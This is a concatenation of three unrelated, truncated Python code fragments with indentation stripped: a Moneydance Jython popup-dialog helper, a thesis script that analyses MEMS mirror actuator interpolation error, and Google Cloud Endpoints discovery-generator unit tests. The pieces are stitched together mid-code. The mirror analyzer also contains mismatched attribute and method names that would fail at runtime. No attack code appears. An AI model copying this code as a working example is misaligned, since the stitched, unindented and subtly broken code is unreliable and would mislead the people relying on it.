self.callingClass._popup_d = JDialog(self.callingClass.theParent, self.callingClass.theTitle, Dialog.ModalityType.APPLICATION_MODAL)
else:
# noinspection PyUnresolvedReferences
self.callingClass._popup_d = JDialog(self.callingClass.theParent, self.callingClass.theTitle, Dialog.ModalityType.MODELESS)
self.callingClass._popup_d.setDefaultCloseOperation(WindowConstants.DO_NOTHING_ON_CLOSE)
shortcut = Toolkit.getDefaultToolkit().getMenuShortcutKeyMaskEx()
# Add standard CMD-W keystrokes etc to close window
self.callingClass._popup_d.getRootPane().getInputMap(JComponent.WHEN_ANCESTOR_OF_FOCUSED_COMPONENT).put(KeyStroke.getKeyStroke(KeyEvent.VK_W, shortcut), "close-window")
self.callingClass._popup_d.getRootPane().getInputMap(JComponent.WHEN_ANCESTOR_OF_FOCUSED_COMPONENT).put(KeyStroke.getKeyStroke(KeyEvent.VK_F4, shortcut), "close-window")
self.callingClass._popup_d.getRootPane().getInputMap(JComponent.WHEN_IN_FOCUSED_WINDOW).put(KeyStroke.getKeyStroke(KeyEvent.VK_ESCAPE, 0), "close-window")
self.callingClass._popup_d.getRootPane().getActionMap().put("close-window", self.callingClass.CancelButtonAction(self.callingClass._popup_d, self.callingClass.fakeJFrame,self.callingClass.lResult))
self.callingClass._popup_d.addWindowListener(self.callingClass.WindowListener(self.callingClass._popup_d, self.callingClass.fakeJFrame,self.callingClass.lResult))
if (not Platform.isMac()):
# MD_REF.getUI().getImages()
self.callingClass._popup_d.setIconImage(MDImages.getImage(MD_REF.getSourceInformation().getIconResource()))
displayJText = JTextArea(self.callingClass.theMessage)
displayJText.setFont( getMonoFont() )
displayJText.setEditable(False)
displayJText.setLineWrap(False)
displayJText.setWrapStyleWord(False)
_popupPanel=JPanel()
# maxHeight = 500
_popupPanel.setLayout(GridLayout(0,1))
_popupPanel.setBorder(EmptyBorder(8, 8, 8, 8))
if self.callingClass.theStatus:
_label1 = JLabel(pad(self.callingClass.theStatus,self.callingClass.theWidth-20))
_label1.setForeground(Color.BLUE)
_popupPanel.add(_label1)
myScrollPane = JScrollPane(displayJText, JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED,JScrollPane.HORIZONTAL_SCROLLBAR_AS_NEEDED)
if displayJText.getLineCount()>5:
myScrollPane.setWheelScrollingEnabled(True)
_popupPanel.add(myScrollPane)
else:
_popupPanel.add(displayJText)
buttonPanel = JPanel()
if self.callingClass.lModal or self.callingClass.lCancelButton:
buttonPanel.setLayout(FlowLayout(FlowLayout.CENTER))
if self.callingClass.lCancelButton:
cancel_button = JButton("CANCEL")
cancel_button.setPreferredSize(Dimension(100,40))
cancel_button.setBackground(Color.LIGHT_GRAY)
cancel_button.setBorderPainted(False)
cancel_button.setOpaque(True)
cancel_button.addActionListener( self.callingClass.CancelButtonAction(self.callingClass._popup_d, self.callingClass.fakeJFrame,self.callingClass.lResult) )
buttonPanel.add(cancel_button)
if self.callingClass.lModal:
ok_button = JButton(self.callingClass.OKButtonText)
if len(self.callingClass.OKButtonText) <= 2:
ok_button.setPreferredSize(Dimension(100,40))
else:
ok_button.setPreferredSize(Dimension(200,40))
ok_button.setBackground(Color.LIGHT_GRAY)
ok_button.setBorderPainted(False)
ok_button.setOpaque(True)
ok_button.addActionListener( self.callingClass.OKButtonAction(self.callingClass._popup_d, self.callingClass.fakeJFrame, self.callingClass.lResult) )
buttonPanel.add(ok_button)
_popupPanel.add(buttonPanel)
if self.callingClass.lAlertLevel>=2:
# internalScrollPane.setBackground(Color.RED)
# theJText.setBackground(Color.RED)
# theJText.setForeground(Color.BLACK)
displayJText.setBackground(Color.RED)
displayJText.setForeground(Color.BLACK)
_popupPanel.setBackground(Color.RED)
_popupPanel.setForeground(Color.BLACK)
buttonPanel.setBackground(Color.RED)
myScrollPane.setBackground(Color.RED)
elif self.callingClass.lAlertLevel>=1:
# internalScrollPane.setBackground(Color.YELLOW)
# theJText.setBackground(Color.YELLOW)
# theJText.setForeground(Color.BLACK)
displayJText.setBackground(Color.YELLOW)
displayJText.setForeground(Color.BLACK)
_popupPanel.setBackground(Color.YELLOW)
_popupPanel.setForeground(Color.BLACK)
buttonPanel.setBackground(Color.YELLOW)
myScrollPane.setBackground(Color.RED)
self.callingClass._popup_d.add(_popupPanel)
self.callingClass._popup_d.pack()
self.callingClass._popup_d.setLocationRelativeTo(None)
self.callingClass._popup_d.setVisible(True) # Keeping this modal....
if not SwingUtilities.isEventDispatchThread():
myPrint("DB",".. Not running within the EDT so calling via MyPopUpDialogBoxRunnable()...")
SwingUtilities.invokeAndWait(MyPopUpDialogBoxRunnable(self))
else:
myPrint("DB",".. Already within the EDT so calling naked...")
MyPopUpDialogBoxRunnable(self).run()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return self.lResult[0]
def play_the_money_sound():
# Seems to cause a crash on Virtual Machine with no Audio - so just in case....
try:
MD_REF.getUI().getSounds().playSound("cash_register.wav")
except:
pass
return
def get_filename_addition():
cal = Calendar.getInstance()
hhmm = str(10000 + cal.get(11) * 100 + cal.get(12))[1:]
nameAddition = "-" + str(DateUtil.getStrippedDateInt()) + "-"+hhmm
return nameAddition
def check_file_writable(fnm):
myPrint("D", "In ", inspect.currentframe().f_code.co_name, "()" )
myPrint("DB","Checking path: ", fnm)
if os.path.exists(fnm):
myPrint("DB", "path exists..")
# path exists
if os.path.isfile(fnm): # is it a file or a dir?
myPrint("DB","path is a file..")
# also works when file is a link and the target is writable
return os.access(fnm, os.W_OK)
else:
myPrint("DB", "path is not a file..")
return False # path is a dir, so cannot write as a file
# target does not exist, check perms on parent dir
myPrint("DB","path does not exist...")
pdir = os.path.dirname(fnm)
if not pdir: pdir = '.'
# target is creatable if parent dir is writable
return os.access(pdir, os.W_OK)
class ExtFilenameFilter(FilenameFilter):
ext = ""
def __init__(self, ext):
self.ext = "." + ext.upper()
def accept(self, thedir, filename): # noqa
if filename is not None and filename.upper().endswith(self.ext):
return True
return False
try:
moneydanceIcon | |
from tesi_ao import main220316
import matplotlib.pyplot as plt
import numpy as np
from astropy.io import fits
from tesi_ao.mems_command_to_position_linearization_measurer import CommandToPositionLinearizationMeasurer
from tesi_ao.mems_command_to_position_linearization_analyzer import CommandToPositionLinearizationAnalyzer
def _what_I_do_on_terminal(): # don't use!
'''
an example of how I used main220303
'''
iea = InterpolationErrorAnalyzer(ACTUATOR=63, NUM_SCAN_LIST=[
10, 20, 30, 40, 50, 60, 100], test_points=20)
# do and save WF maps for each scan sampling
iea.do_more_scans('_f0')
# load mcl objects into a list
mcls_int = iea.load_mcls('_f0')
# plot all the interpolated functions
iea.plot_all_interpolation_functions(mcls_int)
# plot interpolated function difference wrt the one with the biggest
# samples
iea.plot_interpolation_difference(mcls_int)
# from the 'old' mcls elements, we need the interpolated functions
# to compute p2c and save the a 'new' measured mcl object
iea.do_calibrated_measure(mcls_int, '_f0')
# load new mcl
mcls_meas = iea.load_calibrated_measure('_f0')
# Plot the difference between the measured and expected deflection, as a
# function of the expected one
rms_list = iea.plot_Measured_vs_Expected_common(mcls_meas, mcls_int)
iea.fitting_Meas_vs_Exp_common(mcls_meas, rms_list, mcls_int)
class InterpolationErrorAnalyzer(object):
ffmt = '.fits'
def __init__(self, ACTUATOR=63, NUM_SCAN_LIST=[10, 20, 30, 40, 50, 60, 100], test_points=10):
self.ACTUATOR = ACTUATOR
self.NUM_SCAN_LIST = NUM_SCAN_LIST
self.test_points = test_points
self.fpath = 'prova/act%d' % ACTUATOR + '/main220303/cplm'
def _execute_measure(self, fname, Nscan):
'''
Executes WF maps measure, one for each scan, and saves the
related CPLM object into fname.fits.
'''
act_list = [self.ACTUATOR]
wyko, bmc = main220316.create_devices()
cplm = CommandToPositionLinearizationMeasurer(wyko, bmc)
cplm.NUMBER_STEPS_VOLTAGE_SCAN = Nscan
cplm.execute_command_scan(act_list)
cplm.save_results(fname)
def _get_mcl_from_file(self, fname):
'''
From a fits file, loads CPLA object and evaluating
interpolation function.
Returns the related MemsCommandLinearization object.
'''
cpla = CommandToPositionLinearizationAnalyzer(fname)
mcl = cpla.compute_linearization()
return mcl
def _plot_interpolation_function(self, mcl):
plt.plot(mcl._cmd_vector[0], mcl._deflection[0], 'o',
label='%d scans' % mcl._cmd_vector.shape[1])
Npt = 1024
f_int = mcl._finter[0]
span = np.linspace(
min(mcl._cmd_vector[0]), max(mcl._cmd_vector[0]), Npt)
plt.plot(span, f_int(span), '-', color=plt.gca().lines[-1].get_color())
def _get_common_cmds_range(self, mcl_list):
'''
Returns the extremes[a,b] of the common cmd domain
between all interpolated functions
Input: list, mcl_list
Returns: a, b
'''
min_container = []
max_container = []
for mcl in mcl_list:
min_container.append(min(mcl._cmd_vector[0]))
max_container.append(max(mcl._cmd_vector[0]))
a = max(min_container)
b = min(max_container)
return a, b
def _get_common_deflections_range(self, mcl_list):
min_container = []
max_container = []
for mcl in mcl_list:
min_container.append(min(mcl._calibrated_position[0]))
max_container.append(max(mcl._calibrated_position[0]))
a = max(min_container)
b = min(max_container)
return a, b
def do_more_scans(self, version_file):
'''
For each scan sampling defined in NUM_SCAN_LIST,
executes WF mapping through the class objects CPLM and CPLA defined in sandbox.py,
and saves into file.fits
'''
for scans in self.NUM_SCAN_LIST:
print('\n%d voltage scans:' % scans)
fname = self.fpath + '%d' % scans + version_file + self.ffmt
self._execute_measure(fname, scans)
def load_mcls(self, version_file):
'''
Loads MemsCommandLinearization objects defined in sandbox.py,
computed by do_more_scans
and returns them into a list.
Input: string,'vesion_file'
Return: list, mcl_list
len(mcl_list) == number of interpolated function (one for each scan sampling)
'''
mcl_list = []
for scans in self.NUM_SCAN_LIST:
fname = self.fpath + '%d' % scans + version_file + self.ffmt
mcl_list.append(self._get_mcl_from_file(fname))
return mcl_list
def plot_all_interpolation_functions(self, mcl_list):
'''
Plots all interpolated functions obtained by varying scan sampling,
as a function of actuator's deflections.
'''
plt.figure()
plt.clf()
plt.ion()
plt.title('act#%d: interpolation functions for several scans' %
self.ACTUATOR, size=25)
for mcl in mcl_list:
self._plot_interpolation_function(mcl)
plt.xlabel('Commands [au]', size=25)
plt.ylabel('Deflection [m]', size=25)
plt.grid()
plt.legend(loc='best')
def plot_interpolation_difference(self, mcl_list):
'''
Plots the difference between all the interpolated function with
respect to the one computed with the biggest scan sampling, as a function of
actuators deflections.
Input: list, mcl_list
'''
Npt = 1024
# looking for the common deflections domain for the interpolated
# functions
min_span, max_span = self._get_common_cmds_range(mcl_list)
common_span_cmds = np.linspace(
min_span, max_span, Npt)
# interpolated function with the biggest scans sampling
f_ref = mcl_list[-1]._finter[0]
plt.figure()
plt.clf()
plt.ion()
plt.title('act#%d:' % self.ACTUATOR +
'cubic interpolation error w-r-t %dscans' % max(self.NUM_SCAN_LIST), size=25)
for idx, scans in enumerate(self.NUM_SCAN_LIST):
f_i = mcl_list[idx]._finter[0]
plt.plot(common_span_cmds, (f_i(common_span_cmds) -
f_ref(common_span_cmds)) / 1e-9, '.-', label='%d scans' % scans)
print((f_i(common_span_cmds) - f_ref(common_span_cmds)).std())
plt.legend(loc='best')
plt.grid()
plt.ylabel('Deflection Difference [m]', size=25)
plt.xlabel('cmd [au]', size=25)
def do_calibrated_measure(self, mcl_list, version):
'''
Though the interpolated functions contained in the 'old' MCL objects
and listed in mcl_list, saves new WF maps using converted
actuator's deflections (calling p2c and MyCalibrationMeasurer class as defined below).
Input:
list, mcl_list
string, 'file version'
'''
Npt = self.test_points
# self.NUM_SCAN_LIST
act_list = [self.ACTUATOR]
wyko, bmc = main220316.create_devices()
min_span, max_span = self._get_common_deflections_range(mcl_list)
expected_deflection = np.linspace(max_span, min_span, Npt)
# expected_deflection = np.linspace(-800e-9, 1600e-9, Npt) #@act63
#converted_cmd = np.zeros((len(mcl_list), Npt))
for idx, mcl in enumerate(mcl_list):
mcm = MyCalibrationMeasurer(wyko, bmc, mcl, expected_deflection)
mcm.execute_command_scan(act_list)
fname = self.fpath + '%d' % Npt + 'meas' + version + \
'_cal%d' % self.NUM_SCAN_LIST[idx] + self.ffmt
mcm.save_results(fname)
def load_calibrated_measure(self, version):
'''
Loads the 'new' mcl objects from file created by do_calibrated_measure,
and returns them into a list.
Input: string, 'file_version'
Return: list, mcl_list
'''
mcl_list = []
Npt = self.test_points
for scans in self.NUM_SCAN_LIST:
fname = self.fpath + '%d' % Npt + 'meas' + version + \
'_cal%d' % scans + self.ffmt
mcl_list.append(self._get_mcl_from_file(fname))
return mcl_list
def plot_Measured_vs_Expected_common(self, mcl_meas, mcl_int):
'''
Plots the difference between the measured and expected deflection,
as a function of the expected one.
mcl_meas[i]== element of the list loaded from load_calibrated_measure
Input: list, mcls_meas
list, mcl_int (used for common deflection domain evaluation)
'''
Npt = self.test_points
plt.figure()
plt.clf()
min_span, max_span = self._get_common_deflection_range(mcl_int)
#min_span = -800e-9
#max_span = 1600e-9
x_exp = np.linspace(min_span, max_span, Npt) # expected deflections
rms_list = []
for idx in np.arange(len(mcl_meas)):
x_obs = mcl_meas[idx]._deflection[0]
y = x_obs - x_exp
rms = y.std()
rms = rms / 1.e-9
rms_list.append(y.std())
plt.plot(x_exp / 1.e-9, y / 1.e-9, 'o-', label='%d scans' %
self.NUM_SCAN_LIST[idx])
print('rms = %g' % rms + 'nm\t' +
'(Sampling: %d scans)' % self. NUM_SCAN_LIST[idx])
plt.legend(loc='best')
plt.grid()
plt.xlabel('$x_{exp} [nm]$', size=25)
plt.ylabel('$x_{obs} - x_{exp} [nm]$', size=25)
plt.title('act#%d:' % self.ACTUATOR +
' Error in deflection cmds for each interpolation functions Common', size=25)
return rms_list
# something wrong
def fitting_Meas_vs_Exp_common(self, mcl_meas, rms_list, mcl_int):
'''
Plots the best fits for measured vs expected deflection, for each scan sampling.
'''
Npt = self.test_points
plt.figure()
plt.clf()
min_span, max_span = self._get_common_deflection_range(mcl_int)
#min_span = -800e-9
#max_span = 1600e-9
x_exp = np.linspace(min_span, max_span, Npt)
ones = np.ones(Npt)
xx = np.linspace(min_span, max_span, 1024)
for idx in np.arange(len(mcl_meas)):
x_obs = mcl_meas[idx]._deflection[0]
plt.plot(x_exp, x_obs, 'o', label='%d scans' %
self.NUM_SCAN_LIST[idx])
sigma = ones * rms_list[idx]
coeff, coeff_cov = np.polyfit(
x_exp, x_obs, 1, w=sigma, cov=True, full=False)
err_coeff = np.sqrt(np.diag(coeff_cov))
print('\nFit relative to Sampling: %d scans)' %
self. NUM_SCAN_LIST[idx])
print('A = %g' % coeff[0] + '\t+/- %g ' % err_coeff[0])
print('offset = %g' % coeff[1] + '\t+/- %g' % err_coeff[1])
print('Cov Matrix:')
print(coeff_cov)
fit_func = np.poly1d(coeff)
residuals = x_obs - fit_func(x_obs)
chi_2 = np.sum((residuals / sigma)**2)
print('Chi2 = %g' % chi_2)
dof = len(x_obs) - len(coeff)
chi2red = chi_2 / float(dof)
print('RedChi2 = %g' % chi2red)
plt.plot(xx, fit_func(xx), '-', label='relative fit',
color=plt.gca().lines[-1].get_color())
# plt.errorbar(x_exp, x_obs, sigma,
# color=plt.gca().lines[-1].get_color())
plt.legend(loc='best')
plt.grid()
plt.xlabel('$x_{exp} [m]$', size=25)
plt.ylabel('$x_{obs} [m]$', size=25)
plt.title('act#%d:' % self.ACTUATOR +
' Common deflection span', size=25)
# similar to CommandtoPositionLinearizationMeasurer
class MyCalibrationMeasurer(object): # changes when bmc set shape
'''
As CommandToPositionLinearizationMeasurer defined in sandbox.py,
acquires WF maps, one for each expected deflection command.
These deflections are converted in voltage commands through
p2c function stored in MCL object.
'''
NUMBER_WAVEFRONTS_TO_AVERAGE = 1
#NUMBER_STEPS_VOLTAGE_SCAN = 10
def __init__(self, interferometer, mems_deformable_mirror, mlc, expected_deflections):
self._interf = interferometer
self._bmc = mems_deformable_mirror
self._n_acts = self._bmc.get_number_of_actuators()
self._mlc = mlc
self._exp_deflections = expected_deflections
self.NUMBER_STEPS_VOLTAGE_SCAN = len(expected_deflections)
self._wfflat = None
def _get_zero_command_wavefront(self):
if self._wfflat is None:
cmd = np.zeros(self._n_acts)
self._bmc.set_shape(cmd)
self._wfflat = self._interf.wavefront(
self.NUMBER_WAVEFRONTS_TO_AVERAGE)
return self._wfflat
def execute_command_scan(self, act_list=None):
if act_list is None:
act_list = np.arange(self._n_acts)
self._actuators_list = np.array(act_list)
n_acts_to_meas = len(self._actuators_list)
wfflat = self._get_zero_command_wavefront()
self._reference_cmds = self._bmc.get_reference_shape()
self._reference_tag = self._bmc.get_reference_shape_tag()
self._cmd_vector = np.zeros((n_acts_to_meas,
self.NUMBER_STEPS_VOLTAGE_SCAN))
self._wfs = np.ma.zeros(
(n_acts_to_meas, self.NUMBER_STEPS_VOLTAGE_SCAN,
wfflat.shape[0], wfflat.shape[1]))
N_pixels = self._wfs.shape[2] * self._wfs.shape[3]
for act_idx, act in enumerate(self._actuators_list):
self._cmd_vector[act_idx] = self._mcl.linear_p2c(
act, self._exp_deflections)
for cmd_idx in range(len(self._cmd_vector[act_idx])):
print("Act:%d - command" % (act))
cmd = np.zeros(self._n_acts)
cmd[act] = self._mlc.linear_p2c(
act, self._exp_deflections[cmd_idx])
self._bmc.set_shape(cmd)
self._wfs[act_idx, cmd_idx, :,
:] = self._get_wavefront_flat_subtracted()
masked_pixels = self._wfs[act_idx, cmd_idx].mask.sum()
masked_ratio = masked_pixels / N_pixels
if masked_ratio > 0.8227:
print('Warning: Bad measure acquired for: act%d' %
| |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for endpoints.discovery_generator."""
import json
import os
import unittest
import test_util
from endpoints import api_config
from endpoints import api_exceptions
from endpoints import discovery_generator
from endpoints import message_types
from endpoints import messages
from endpoints import remote
from endpoints import resource_container
from endpoints import types as endpoints_types
from endpoints import users_id_token
package = 'DiscoveryGeneratorTest'
class Nested(messages.Message):
"""Message class to be used in a message field."""
int_value = messages.IntegerField(1)
string_value = messages.StringField(2)
class SimpleEnum(messages.Enum):
"""Simple enumeration type."""
VAL1 = 1
VAL2 = 2
class IdField(messages.Message):
"""Just contains an integer field."""
id_value = messages.IntegerField(1, variant=messages.Variant.INT32)
class AllFields(messages.Message):
"""Contains all field types."""
bool_value = messages.BooleanField(1, variant=messages.Variant.BOOL)
bytes_value = messages.BytesField(2, variant=messages.Variant.BYTES)
double_value = messages.FloatField(3, variant=messages.Variant.DOUBLE)
enum_value = messages.EnumField(SimpleEnum, 4)
float_value = messages.FloatField(5, variant=messages.Variant.FLOAT)
int32_value = messages.IntegerField(6, variant=messages.Variant.INT32)
int64_value = messages.IntegerField(7, variant=messages.Variant.INT64)
string_value = messages.StringField(8, variant=messages.Variant.STRING)
uint32_value = messages.IntegerField(9, variant=messages.Variant.UINT32)
uint64_value = messages.IntegerField(10, variant=messages.Variant.UINT64)
sint32_value = messages.IntegerField(11, variant=messages.Variant.SINT32)
sint64_value = messages.IntegerField(12, variant=messages.Variant.SINT64)
message_field_value = messages.MessageField(Nested, 13)
datetime_value = message_types.DateTimeField(14)
# This is used test "all fields" as query parameters instead of the body
# in a request.
ALL_FIELDS_AS_PARAMETERS = resource_container.ResourceContainer(
**{field.name: field for field in AllFields.all_fields()})
class BaseDiscoveryGeneratorTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
def setUp(self):
self.generator = discovery_generator.DiscoveryGenerator()
def _def_path(self, path):
return '#/definitions/' + path
class DiscoveryGeneratorTest(BaseDiscoveryGeneratorTest):
def testAllFieldTypes(self):
class PutRequest(messages.Message):
"""Message with just a body field."""
body = messages.MessageField(AllFields, 1)
# pylint: disable=invalid-name
class ItemsPutRequest(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
entryId = messages.StringField(2, required=True)
class ItemsPutRequestForContainer(messages.Message):
"""Message with path params and a body field."""
body = messages.MessageField(AllFields, 1)
items_put_request_container = resource_container.ResourceContainer(
ItemsPutRequestForContainer,
entryId=messages.StringField(2, required=True))
# pylint: disable=invalid-name
class EntryPublishRequest(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entryId = messages.StringField(2, required=True)
class EntryPublishRequestForContainer(messages.Message):
"""Message with two required params, one in path, one in body."""
title = messages.StringField(1, required=True)
entry_publish_request_container = resource_container.ResourceContainer(
EntryPublishRequestForContainer,
entryId=messages.StringField(2, required=True))
class BooleanMessageResponse(messages.Message):
result = messages.BooleanField(1, required=True)
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(message_types.VoidMessage, BooleanMessageResponse,
path ='toplevel:withcolon', http_method='GET',
name='toplevelwithcolon')
def toplevel(self, unused_request):
return BooleanMessageResponse(result=True)
@api_config.method(AllFields, message_types.VoidMessage, path='entries',
http_method='GET', name='entries.get')
def entries_get(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(ALL_FIELDS_AS_PARAMETERS, message_types.VoidMessage,
path='entries/container', http_method='GET',
name='entries.getContainer')
def entries_get_container(self, unused_request):
"""All field types in the query parameters."""
return message_types.VoidMessage()
@api_config.method(PutRequest, BooleanMessageResponse, path='entries',
name='entries.put')
def entries_put(self, unused_request):
"""Request body is in the body field."""
return BooleanMessageResponse(result=True)
@api_config.method(AllFields, message_types.VoidMessage, path='process',
name='entries.process')
def entries_process(self, unused_request):
"""Message is the request body."""
return message_types.VoidMessage()
@api_config.method(message_types.VoidMessage, message_types.VoidMessage,
name='entries.nested.collection.action',
path='nested')
def entries_nested_collection_action(self, unused_request):
"""A VoidMessage for a request body."""
return message_types.VoidMessage()
@api_config.method(AllFields, AllFields, name='entries.roundtrip',
path='roundtrip')
def entries_roundtrip(self, unused_request):
"""All field types in the request and response."""
pass
# Test a method with a required parameter in the request body.
@api_config.method(EntryPublishRequest, message_types.VoidMessage,
path='entries/{entryId}/publish',
name='entries.publish')
def entries_publish(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
@api_config.method(entry_publish_request_container,
message_types.VoidMessage,
path='entries/container/{entryId}/publish',
name='entries.publishContainer')
def entries_publish_container(self, unused_request):
"""Path has a parameter and request body has a required param."""
return message_types.VoidMessage()
# Test a method with a parameter in the path and a request body.
@api_config.method(ItemsPutRequest, message_types.VoidMessage,
path='entries/{entryId}/items',
name='entries.items.put')
def items_put(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
@api_config.method(items_put_request_container, message_types.VoidMessage,
path='entries/container/{entryId}/items',
name='entries.items.putContainer')
def items_put_container(self, unused_request):
"""Path has a parameter and request body is in the body field."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'allfields.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print 'Could not find expected output file ' + test_file
raise e
test_util.AssertDictEqual(expected_discovery, api, self)
def testNamespace(self):
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API',
namespace=api_config.Namespace('domain', 'name', 'path'))
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(IdField, message_types.VoidMessage, path='entries',
http_method='GET', name='get_entry')
def entries_get(self, unused_request):
"""Id (integer) field type in the query parameters."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'namespace.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print 'Could not find expected output file ' + test_file
raise e
test_util.AssertDictEqual(expected_discovery, api, self)
def testNamespaceDefaultPath(self):
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API',
namespace=api_config.Namespace('domain', 'name', None))
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(IdField, message_types.VoidMessage, path='entries',
http_method='GET', name='get_entry')
def entries_get(self, unused_request):
"""Id (integer) field type in the query parameters."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'namespace.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print 'Could not find expected output file ' + test_file
raise e
# Clear the value of the packagePath parameter in the expected results
expected_discovery['packagePath'] = ''
test_util.AssertDictEqual(expected_discovery, api, self)
def testNamespaceWithoutNamespace(self):
"""
The owner_domain, owner_name, and package_path can all
be specified directly on the api.
"""
@api_config.api(name='root', hostname='example.appspot.com', version='v1',
description='This is an API',
owner_domain='domain', owner_name='name', package_path='path')
class MyService(remote.Service):
"""Describes MyService."""
@api_config.method(IdField, message_types.VoidMessage, path='entries',
http_method='GET', name='get_entry')
def entries_get(self, unused_request):
"""Id (integer) field type in the query parameters."""
return message_types.VoidMessage()
api = json.loads(self.generator.pretty_print_config_to_json(MyService))
try:
pwd = os.path.dirname(os.path.realpath(__file__))
test_file = os.path.join(pwd, 'testdata', 'discovery', 'namespace.json')
with open(test_file) as f:
expected_discovery = json.loads(f.read())
except IOError as e:
print 'Could not find expected output file ' + test_file
raise e
test_util.AssertDictEqual(expected_discovery, api, self)
class DiscoveryMultiClassGeneratorTest(BaseDiscoveryGeneratorTest):
def testMultipleClassService(self):
'''If multiple classes of a single service are passed to the
generator, the document should show all methods from all
classes.'''
class Airport(messages.Message):
iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
IATA_RESOURCE = resource_container.ResourceContainer(
iata=messages.StringField(1, required=True)
)
class AirportList(messages.Message):
airports = messages.MessageField(Airport, 1, repeated=True)
@api_config.api(name='iata', version='v1')
class ServicePart1(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'DEN', name=u'Denver International Airport'),
Airport(iata=u'SEA', name=u'Seattle Tacoma International Airport'),
])
@api_config.api(name='iata', version='v1')
class ServicePart2(remote.Service):
@api_config.method(
IATA_RESOURCE,
Airport,
path='airport/{iata}',
http_method='GET',
name='get_airport')
def get_airport(self, request):
airports = {
'DEN': 'Denver International Airport'
}
if request.iata not in airports:
raise endpoints.NotFoundException()
return Airport(iata=request.iata, name=airports[request.iata])
doc = self.generator.get_discovery_doc([ServicePart1, ServicePart2])
self.assertItemsEqual(doc['methods'].keys(), [u'get_airport', u'list_airports'])
def testMethodCollisionDetection(self):
'''While multiple classes can be passed to the generator at once,
they should all belong to the same api and version.'''
class Airport(messages.Message):
iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
class AirportList(messages.Message):
airports = messages.MessageField(Airport, 1, repeated=True)
@api_config.api(name='iata', version='v1')
class V1Service(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'DEN', name=u'Denver International Airport'),
Airport(iata=u'SEA', name=u'Seattle Tacoma International Airport'),
])
@api_config.api(name='iata', version='v2')
class V2Service(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'DEN', name=u'Denver International Airport'),
Airport(iata=u'JFK', name=u'<NAME> International Airport'),
Airport(iata=u'SEA', name=u'Seattle Tacoma International Airport'),
])
error = "Multiple apis/versions found: [('iata', 'v1'), ('iata', 'v2')]"
with self.assertRaises(api_exceptions.ApiConfigurationError) as catcher:
self.generator.get_discovery_doc([V1Service, V2Service])
self.assertEqual(catcher.exception.message, error)
@api_config.api(name='iata', version='v1')
class V1ServiceCont(remote.Service):
@api_config.method(
message_types.VoidMessage,
AirportList,
path='airports',
http_method='GET',
name='list_airports')
def list_airports(self, request):
return AirportList(airports=[
Airport(iata=u'JFK', name=u'<NAME> International Airport'),
])
error = "Method iata.list_airports used multiple times"
with self.assertRaises(api_exceptions.ApiConfigurationError) as catcher:
self.generator.get_discovery_doc([V1Service, V1ServiceCont])
self.assertEqual(catcher.exception.message[:len(error)], error)
class DiscoveryScopeGeneratorTest(BaseDiscoveryGeneratorTest):
def testDefaultScope(self):
IATA_RESOURCE = resource_container.ResourceContainer(
iata=messages.StringField(1)
)
class IataParam(messages.Message):
iata = messages.StringField(1)
class Airport(messages.Message):
iata = messages.StringField(1, required=True)
name = messages.StringField(2, required=True)
@api_config.api(
name='iata', version='v1',
auth_level=api_config.AUTH_LEVEL.REQUIRED,
allowed_client_ids=users_id_token.SKIP_CLIENT_ID_CHECK)
class IataApi(remote.Service):
@api_config.method(
IATA_RESOURCE,
Airport,
path='airport/{iata}',
http_method='GET',
name='get_airport')
def get_airport(self, request):
return Airport(iata=request.iata, name='irrelevant')
doc = self.generator.get_discovery_doc([IataApi])
auth = doc['auth']
assert auth == {
'oauth2': {
'scopes': {
'https://www.googleapis.com/auth/userinfo.email': {
'description': 'View your email address'
}
}
}
}
def testCustomScope(self):
SCOPE = endpoints_types.OAuth2Scope(
scope='https://www.googleapis.com/auth/santa',
description='Access your letter to Santa')
IATA_RESOURCE = resource_container.ResourceContainer(
iata=messages.StringField(1)
)
class IataParam(messages.Message):
iata = messages.StringField(1)
class Airport(messages.Message):
